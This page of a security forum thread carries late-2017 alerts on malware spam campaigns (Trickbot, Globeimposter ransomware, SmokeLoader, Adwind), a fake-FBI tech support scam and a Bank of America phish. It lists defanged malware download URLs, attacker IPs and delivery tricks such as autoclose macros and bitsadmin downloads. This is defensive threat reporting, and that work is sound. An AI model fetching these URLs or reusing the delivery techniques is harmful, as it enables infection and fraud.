Page 132 of 132 FirstFirst ... 3282122128129130131132
Results 1,311 to 1,320 of 1320

Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #1311
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake 'account documents' SPAM

    FYI...

    Fake 'account documents' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/trick...-form-malspam/
    7 Dec 2017 - "... an email containing the subject of 'Your account documents' pretending to come from Companies House but actually coming from a look-a-like or typo-squatted domain <no-reply@ companieshouseform .co.uk> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ecure-form.png

    SecureForm84.doc - Current Virus total detections 3/60*| Hybrid Analysis**... This malware docx file downloads from
    http ://aperhu .com/ser0712.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ejjmdejh9.exe (VirusTotal 8/68[3])...
    The alternative download location is
    http ://altarek .com/ser0712.png... Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services...
    companieshouseform .co.uk hosted on numerous servers and IP addresses and sending the emails via 185.207.204.218 | 185.23.215.76 | 89.39.106.208 | All of which are based in Netherlands...
    Malware detail:
    > https://myonlinesecurity.co.uk/wp-co...m_word_doc.png
    DO NOT follow the advice they give to enable macros or enable editing to see the content..."
    * https://www.virustotal.com/en/file/2...is/1512651253/
    SecureForm6.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    146.255.36.1
    143.95.252.46

    Contacted Hosts
    143.95.252.46
    146.255.36.1
    185.80.128.223
    82.146.47.221
    185.125.46.161


    3] https://www.virustotal.com/en/file/b...is/1512647520/
    fbwnk.exe

    aperhu .com: 143.95.252.46: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/8a...01d0/analysis/

    altarek .com: 64.50.184.217: https://www.virustotal.com/en/ip-add...7/information/
    > https://www.virustotal.com/en/url/c1...50bb/analysis/

    Last edited by AplusWebMaster; 2017-12-07 at 16:34.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #1312
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake 'Amazon invoice' SPAM

    FYI...

    Fake 'Amazon invoice' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/fake-...necurs-botnet/
    12 Dec 2017 - "... Necurs botnet has changed again today...
    Update: I am informed that this is definitely Trickbot banking trojan, not ransomware, although several antiviruses are detecting it as a ransomware version. An email with the subject of 'Invoice RE-2017-12-12-00572' (random numbers after the date) pretending to come from Amazon Marketplace <lqftdwbmxYYfT@ marketplace.amazon .com> (random characters before the @) with a malicious word doc attachment...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...arketplace.png

    RE-2017-12-12-00572.doc - Current Virus total detections 12/59*. Hybrid Analysis**...
    This malware downloads from
    http ://ragazzemessenger .com/nyRhdkwSD which gave ejmaryj8.exe (VirusTotal 9/67[3]) (Hybrid Analysi[4])...
    There will be loads of other download sites... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
    * https://www.virustotal.com/en/file/8...is/1513080354/
    RE-2017-12-12-00775.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    158.69.26.138
    98.124.251.168

    Contacted Hosts
    98.124.251.168
    158.69.26.138
    67.209.219.92
    179.43.147.243
    95.213.237.241


    3] https://www.virustotal.com/en/file/2...is/1513080273/

    4] https://www.hybrid-analysis.com/samp...ironmentId=100

    ragazzemessenger .com: 98.124.251.168: https://www.virustotal.com/en/ip-add...8/information/
    > https://www.virustotal.com/en/url/a8...4c38/analysis/

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  3. #1313
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake 'Scan' SPAM, Fake FBI phish, AIM discontinued

    FYI...

    Fake 'Scan' SPAM - delivers Globeimposter ransomware
    - https://myonlinesecurity.co.uk/anoth...are-but-fails/
    15 Dec 2017 - "... Necurs botnet has messed up again today... an email with the subject of 'Scan' pretending to come from random names and email addresses... It is trivially easy to decode the base64 section, create the 7z file & extract the vbs to get the Globeimposter ransomware they are attempting to deliver. Over the last few weeks we have seen this behaviour several times. Sometimes with 7z or zip files. Sometimes with word docs...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...5_08-02-13.png

    Scan_00057.7z: - Extracts to: Scan_005287.vbs - Current Virus total detections 7/60*. Hybrid Analysis**...
    This particular version downloads from
    http ://peopleiknow .org/JKHhgdf72? - there will be several other locations in -other- vbs files...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/8...is/1513324220/
    Scan_005287.vbs

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    peopleiknow .org: 67.210.102.240: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/1e...3e61/analysis/
    ___

    Fake FBI phish - leads to Tech Support Scam
    - https://myonlinesecurity.co.uk/fake-...-support-scam/
    14 Dec 2017 - "... It pretends to be a message from the FBI saying you might be a victim of cyber crime and you should ring the phone number in the email. The phone number belongs to a dubious Tech Support service:
    globalphonesupport .com: 69.89.31.186: https://www.virustotal.com/en/ip-add...6/information/

    If you are unwise enough to ring the number you will be falsely told that there is something wrong with your computer. 'It needs cleaning'... and it will cost you at least one hundred USD to repair.
    It is highly likely that these scammers will ask you to install a 'remote access program' (although they call it something else)...
    Unusually there is no link in this email. [Some] of these scams will have a link that leads to page saying your computer is infected with Zeus trojan or similar that locks-the-browser and displays the phone number to ring...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...pport-Scam.png

    " ... RE: Case: 8755174734
    The IP address registered on your name was referred to our ICC Center multiple times as being a possible victim of cyber crime.
    We believe that your IP address and other identifying information were used to commit several computer fraud and abuse crimes. This investigation covers the time period from August 7, 2017 to the present date.
    We appreciate your instant assistance to this matter. Please contact us urgently with all of the information concerning this case, at telephone number listed below...
    "

    These emails use Social engineering tricks to persuade you to open the attachments, follow links or ring the phone number in the email...
    ___

    AIM - discontinued on Dec 15, 2017
    - https://help.aol.com/articles/aim-discontinued
    "As of December 15, 2017, AOL Instant Messenger products and services will be shut down and will no longer work.
    If you are an AOL member, AOL products and services​ ​like AO​​L Mail, AOL Desktop Gold an​d Member​ Subscriptions will not be affected.​ To view your benefits, please visit: https://mybenefits.aol.com/ "

    Last edited by AplusWebMaster; 2017-12-15 at 18:09.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  4. #1314
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake 'Website Job Application' SPAM, Office - malware delivery platform

    FYI...

    Fake 'Website Job Application' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/more-...erent-malware/
    20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/ sharik trojan...
    1] https://myonlinesecurity.co.uk/websi...be-ransomware/
    2] https://myonlinesecurity.co.uk/spear...ds-to-malware/
    3] https://myonlinesecurity.co.uk/fake-...liver-malware/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...sume_eml-1.png

    Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either has some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
    http ://80.82.67.217/paddle.jpg which of course it -not- an image file but a renamed .exe (ASxas.exe)
    VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
    but Anyrun could not get anything despite leaving it running for 10 minutes...
    This word doc looks like this:
    > https://myonlinesecurity.co.uk/wp-co...sume_1_doc.png
    And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
    > https://myonlinesecurity.co.uk/wp-co...sume_2_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/d...is/1513715092/
    Resume.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    4] https://www.virustotal.com/en/file/f...is/1513716371/
    paddle.jpg.exe

    5] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    37.59.55.60
    107.181.246.221

    Contacted Hosts
    139.59.208.246
    107.181.246.221
    188.165.214.95


    6] https://www.virustotal.com/en/file/9...d51c/analysis/
    bitcoinminer1

    80.82.67.217: https://www.virustotal.com/en/ip-add...7/information/
    > https://www.virustotal.com/en/url/f4...cbe9/analysis/
    ___

    Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
    ... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
    > https://www.computerworld.com/articl...fuscation.html
    Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
    (Much more detail at the computerworld URL above.)

    ADV170021 | Microsoft Office Defense in Depth Update
    - https://portal.msrc.microsoft.com/en...sory/ADV170021
    12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
    > https://docs.microsoft.com/en-us/sec...s/2017/4053440
    Updated: Dec 12, 2017

    >> https://www.askwoody.com/forums/topi...n/#post-153388
    Dec 20, 2017

    Last edited by AplusWebMaster; 2017-12-20 at 16:22.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  5. #1315
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Exclamation DoubleClick Ad XSS vuln, Cryptominers ...

    FYI...

    DoubleClick Advertising network XSS vuln
    - https://myonlinesecurity.co.uk/doubl...vulnerability/
    21 Dec 2017 - "Just a quick alert about an email from Google warning of vulnerabilities in some DoubleClick publishers. This has been sent to all website owners who use DoubleClick in any form. However this will ONLY affect website owners who use DoubleClick as a stand alone service to display adverts. It does not affect website owners who use Google AdSense to display adverts and have enabled the additional options to also use DoubleClick as a method of advertising in the allowed advertisers section of your Google AdSense settings page:
    > https://myonlinesecurity.co.uk/wp-co..._XSS_alert.png
    The email reads:
    'Dear Customer,
    We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files...'"
    (More detail at the myonlinesecurity URL above.)

    > https://support.google.com/dfp_premium/answer/7622991
    ___

    Cryptominers...
    - https://umbrella.cisco.com/blog/2017...mining-mayhem/
    Dec 19, 2017 - "As cryptocurrencies continue to increase in value, cryptomining becomes increasingly more lucrative. With Bitcoin nearly reaching $18,000USD/1BTC, speculation that other cryptocurrencies such as Etherium and Monero may hit this mark eventually is rising. Monero is especially interesting given that one of its primary advantages is the relatively low processing power needed to mine it. Given that it is capable of being mined even by consumer grade computers, many organizations have tried to capitalize on this facet of the currency.
    > https://s3-us-west-1.amazonaws.com/u...eOfTheCoin.png
    Launched in September of this year, Coinhive is a service that has transformed the internet already in its short life. 'Coinhive' allows users to embed JavaScript API calls to enable anonymous mining of Monero cryptocurrency in browsers. 'Monero' aims to improve on existing cryptocurrency design by obscuring the sender, recipient and amount of every transaction made, as well as making the mining process more egalitarian by lowering processing costs. Though Coinhive as an organization has said they want users to come up with new uses for their service, it’s hard to imagine they wanted users to create apps that then go on to be abused...
    It’s impossible to say with accuracy where the future will take cryptocurrencies or cryptominers, but they’re almost certainly here to stay. As the internet continues to evolve in its third decade of existence, enterprising individuals will always be looking for the next motherlode, taking advantage of a landscape that others can’t see."
    (More detail at the umbrella.cisco URL above.)

    Last edited by AplusWebMaster; 2017-12-21 at 17:49.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  6. #1316
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake 'Outstanding Statement' SPAM

    FYI...

    Fake 'Outstanding Statement' SPAM - delivers ransomware
    - https://myonlinesecurity.co.uk/fake-...er-ransomware/
    22 Dec 2017 - "... malware downloaders from the Necurs botnet... an email with the subject of 'Outstanding Statement' pretending to come from Prime Express Oldham <sales62@ primeexpressuk .com> (random numbers after sales) delivering Globeimposter ransomware...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...2_11-48-59.png

    Customer Statement (122017_6816162).7z: Extracts to: Customer Statement (122017_51767638).js
    Current Virus total detections 16/55*. Hybrid Analysis**...
    This js file downloads from
    http ://www.upperlensmagazine .com/tOldHSYW??DVTCGAtym=DVTCGAtym (VirusTotal 11/68[3]). As usual there will be 6 or 8 other download sites... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/7...is/1480616575/
    -6dt874p53077.js

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    45.126.209.154
    Contacted Hosts
    45.126.209.154

    3] https://www.virustotal.com/en/file/d...is/1513941343/
    GWMadFzby2.exe

    upperlensmagazine .com: 45.126.209.154: https://www.virustotal.com/en/ip-add...4/information/
    > https://www.virustotal.com/en/url/3d...ae1b/analysis/

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  7. #1317
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake 'UPS Invoice' SPAM

    FYI... Bah Humbug! ...

    Fake 'UPS Invoice' SPAM - delivers Java Adwind
    - https://myonlinesecurity.co.uk/fake-...a-jrat-trojan/
    24 Dec 2017

    Screenshot: https://myonlinesecurity.co.uk/wp-co...PS_Invoice.png

    INVOICE.zip: extracts to INVOICEE.jar (533kb) - Current Virus total detections 14/61* | Hybrid Analysis**...

    "... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

    * https://www.virustotal.com/en/file/f...is/1514092872/
    INVOICEE.jar

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    185.171.25.4
    Contacted Hosts
    46.246.120.179
    92.122.154.56


    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  8. #1318
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake blank/empty SPAM, WordPress Brute Force Attacks

    FYI...

    Fake blank/empty SPAM - delivers globeimposter ransomware
    - https://myonlinesecurity.co.uk/more-...er-ransomware/
    26 Dec 2017 - "... malware downloaders from the Necurs botnet... a blank/empty email with the subject of 'CCE26122017_004385' (random numbers after the date) pretending to come from random names and random email addresses that just has a 7z attachment containing a .js file... One of the emails looks like:
    From: Emmitt <Emmitt@ kendrixcorp .com>
    Date: Tue 26/12/2017 15:04
    Subject: CCE26122017_004385
    Attachment: CCE26122017_004385.7z

    Body content: completely blank/empty

    Screenshot: https://myonlinesecurity.co.uk/wp-co...6_15-28-28.png

    CCE26122017_004385.7z: Extracts to: CCE26122017_48779.js - Current Virus total detections 11/58*. Hybrid Analysis**...
    This particular version downloads from
    http ://www.thedournalist .com/mnbTREkfDS??jYAbcsB=jYAbcsB (there will normally be 6-8 other download locations)
    (VirusTotal 7/68[3])...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/1...is/1514301126/
    CCE26122017_48779.js

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    86.106.30.37
    Contacted Hosts
    86.106.30.37

    3] https://www.virustotal.com/en/file/3...is/1514301538/
    mnbTREkfDS.exe

    thedournalist .com: 86.106.30.37: https://www.virustotal.com/en/ip-add...7/information/
    ___

    Massive Brute-Force Attack Infects WordPress Sites with Monero Miners
    - https://www.bleepingcomputer.com/new...monero-miners/
    Dec 20, 2017 - "... WordPress sites around the globe have been the targets of a massive brute-force campaign during which hackers attempted to guess admin account logins in order to install a Monero miner on compromised sites...
    Once attackers get in, they install a Monero miner, and they also use the infected site to carry out further brute-force attacks. These two operations don't happen at the same time, and each site is either brute-forcing other WordPress sites or mining Monero..."

    WordPress Brute Force Attack Campaign
    - https://www.wordfence.com/blog/2017/...rdpress-attack
    Dec 18, 2017 - "A massive distributed brute force attack campaign targeting WordPress sites started this morning at 3am Universal Time, 7pm Pacific Time. The attack is broad in that it uses a large number of attacking IPs, and is also deep in that each IP is generating a huge number of attacks. This is the most aggressive campaign we have seen to date, peaking at over 14 million attacks per hour. The attack campaign was so severe that we had to scale up our logging infrastructure to cope with the volume when it kicked off, which makes it clear that this is the highest volume attack that we have seen in Wordfence history, since 2012..."
    ___

    Remove the Slmgr32.exe Monero CPU Miner
    - https://www.bleepingcomputer.com/vir...nero-cpu-miner
    Nov 3, 2017

    Last edited by AplusWebMaster; 2017-12-26 at 22:16.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  9. #1319
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down Fake 'Scan' SPAM, Apple 'Batterygate'

    FYI...

    Fake 'Scan' SPAM - Necurs botnet traffic
    - https://myonlinesecurity.co.uk/freak...er-ransomware/
    29 Dec 2017 - "... Necurs botnet... several hundred I have received in the last hour have been quarantined on my mail server. The next in the never ending series of malware downloaders is an email with the subject of 'Scan' pretending to come from random names and email address. The name in the email body matches the alleged sender...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...9_10-17-04.png

    Scan_0041.7z: Extracts to: -6dt874p53077.js - Current Virus total detections 14/59*. Hybrid Analysis**...
    This particular js has these 3 urls embedded in it (there will be dozens of other Urls that download the payload in different js files). It uses the first url & only moves to the next if the first does not respond
    (VirusTotal 9/66[3])...
    http ://damynghedunglinh .com/YoepHGds?
    http ://3dpvietnam .com/YoepHGds?
    http ://emergency-help .com.au/YoepHGds? ...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/1...is/1514542049/
    Scan_005416.js

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    198.143.137.42
    Contacted Hosts
    198.143.137.42

    3] https://www.virustotal.com/en/file/1...is/1514542104/
    YoepHGds.exe

    damynghedunglinh .com: 198.143.137.42: https://www.virustotal.com/en/ip-add...2/information/
    > https://www.virustotal.com/en/url/1d...a43c/analysis/
    ___

    Apple 'Batterygate'
    >> https://www.cnbc.com/2017/12/28/appl...full-text.html
    Dec 29, 2017 - 14 Hours Ago
    "Apple apologizes for iPhone slowdowns and offers $29 battery replacements..."
    Video 1:55
    >> https://www.reuters.com/article/us-a...-idUSKBN1EM20N
    Dec 28, 2017 - "... Apple Inc (AAPL.O) is slashing prices for battery replacements and will change its software to show users whether their phone battery is good..."

    > https://www.apple.com/iphone-battery-and-performance/
    Dec 28, 2017 - "A Message to Our Customers about iPhone Batteries and Performance...
    Apple is reducing the price of an out-of-warranty iPhone battery replacement by $50 — from $79 to $29 — for anyone with an iPhone 6 or later whose battery needs to be replaced, starting in late January and available worldwide through December 2018. Details will be provided soon on apple.com.
    Early in 2018, we will issue an iOS software update with new features that give users more visibility into the health of their iPhone’s battery, so they can see for themselves if its condition is affecting performance..."

    Last edited by AplusWebMaster; 2017-12-29 at 14:31.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  10. #1320
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,878

    Thumbs down BoA - phish

    FYI...

    BoA - phish
    - https://myonlinesecurity.co.uk/bank-...lert-phishing/
    17 Jan 2017 - ".... an aggressive phishing campaign against Bank of America arriving overnight UK time. They all pretend to come from Bank of America < BankofAmerica@ customerloyalty.accounts.com > but are actually coming from various servers. I have posted details of 2 that I received. The emails are identical apart for the subject line. There will almost certainly be other similar subjects that I haven’t seen yet.
    The subjects I have seen so far are:
    Bank of America Alert Sign-in to Online Banking Locked
    Bank of America Alert: Unlock Your Account Important Message From Bank Of America ®

    Screenshot: https://myonlinesecurity.co.uk/wp-co...7_04-18-51.png

    The link in the email http ://www .valaskabela .sk/new .php -redirects- you to:
    http ://bankofamerica-com-update-work-new2018.hbdhshjdsjkds .co.uk/d983474dae569d3bdffe8735ae43151a/ (random ID /referral string after the co.uk/)...

    hbdhshjdsjkds .co.uk: 162.241.225.135: https://www.virustotal.com/en/ip-add...5/information/
    > https://www.virustotal.com/en/url/1e...a003/analysis/

    accounts .com: 204.14.52.151: https://www.virustotal.com/en/ip-add...1/information/
    > https://www.virustotal.com/en/url/d7...c1df/analysis/

    Screenshot2: https://myonlinesecurity.co.uk/wp-co...7_04-18-01.png

    All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •